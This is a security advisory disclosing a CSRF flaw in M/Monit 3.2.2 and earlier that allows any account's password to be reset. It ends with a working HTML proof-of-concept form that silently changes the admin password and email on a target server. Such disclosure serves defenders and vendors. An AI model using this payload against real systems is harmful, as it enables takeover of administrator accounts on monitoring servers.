Vulnerability title: M/Monit CSRF Author: Dolev Farhi Contact: dolevf at
openflare dot com @dolevff Application: M/Monit 3.2.2 Date: 13.9.2014
Relevant CVEs: N/A Vulnerable version: <= 3.2.2 Fixed version: N/A 1.
About the application ------------------------ Easy, proactive
monitoring of Unix systems, network and cloud services. Conduct
automatic maintenance and recovery and execute meaningful causal actions
in error situations M/Monit expand on Monit's capabilities and provides
monitoring and management of all your Monit enabled hosts via a modern,
clean and well designed user interface which also works on mobile
devices. 2. Vulnerabilities Descriptions: -----------------------------
It was found that M/Monit latest version is vulnerable to CSRF attacks.
it is possible to reset the password of any user account (admin/regular)
on the system without needing to know the current set password for the
attacked account. 3. Proof of concept exploit
---------------------------- <html> <! -- CSRF PoC for M/Monit --> <div
align="center"> <pre> <h2><b> 		 CSRF PoC for M/monit 			<b></h2> <body>
<form action="http://mmonit_server:8080/admin/users/update"
method="POST"> <input type="hidden" name="fullname"
value="Administrator" /> <input type="hidden" name="password"
value="Attacker_Passw0rd" /> <input type="hidden" name="email"
value="attacker@email.com" /> <input type="hidden" name="admin"
value="on" /> <input type="hidden" name="uname" value="admin" /> <input
type="submit" name="submit" value="Attack" /> 	</form> 	</body> </div>
</html>